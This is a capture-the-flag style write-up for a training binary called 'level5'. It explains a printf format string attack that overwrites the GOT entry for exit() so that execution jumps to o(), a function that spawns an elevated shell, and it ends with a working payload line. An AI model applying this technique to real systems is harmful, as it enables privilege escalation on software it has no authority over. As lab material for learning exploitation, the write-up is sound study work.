# Level5

## Observations

1. The programs simply repeat the given input and then exits.
2. The program uses `printf()` without any format string.
3. There is an `o()` function that spawns an elevated shell but is never called.
4. The programs always end by calling `exit()`.

## Plan

We will use the same `printf()` *Format String Attack* to rewrite the **GOT** (*Global Offset Table*) and make it so calling `exit()` will instead call `o()`.

### How could that ever happen ?

If you take a lool at the calls to Libc functions with GDB you will notice this syntax :
```txt
0x080484ff <+61>: call 0x80483d0 <exit@plt>
```

The function being called, `<exit@plt>`, is not the `exit()` function per se.  
It is a buffer function that will make the program jump to the *GOT* where the actual address of the `exit()` function resides.  
The *GOT* is writable, so if we can override the actual address of the `exit()` function in the *GOT* by the address of another function then calling `<exit@plt>` will execute that other function instead of `exit()`.

Let's have a look at `<exit@plt>` :
```txt
(gdb) disas exit
Dump of assembler code for function exit@plt:
   0x080483d0 <+0>:     jmp    *0x8049838
   0x080483d6 <+6>:     push   $0x28
   0x080483db <+11>:    jmp    0x8048370
End of assembler dump.
```
As we can see, all `exit@plt` does is jump to the address pointed by **0x8049838**.  
We want to override the address pointed by **0x8049838** with the address of `o()`.

### Get the address of `o`

```txt
nm level5
[...]
080484a4 T o
```
The address of `o()` is **0x080484a4**.

### Find the start of `printf()` buffer in the stack

```bash
(python -c 'print "AAAA" + " %08x" * 10') | ./level5 
AAAA 00000200 b7fd1ac0 b7ff37d0 41414141 38302520 30252078 25207838 20783830 78383025 38302520
```
With some *Format String Attack*, we find out that our buffer starts in the **4th group** of 4 bytes values down the stack when `printf()` is called.

Alright so we want to write the value `134513828 (0x080484a4)` at the address *0x8049838* knowing that said address will be in the *4th group*.

## Payload

```bash
(python -c 'print "\x08\x04\x98\x38"[::-1] + "%134513824d" + "%4$n"'; cat -) | ./level5
```

Since we already wrote `4` bytes with the address, we only need *134513824* more to reach `134513828` written bytes.  
As usual, the address is converted to Little Endian.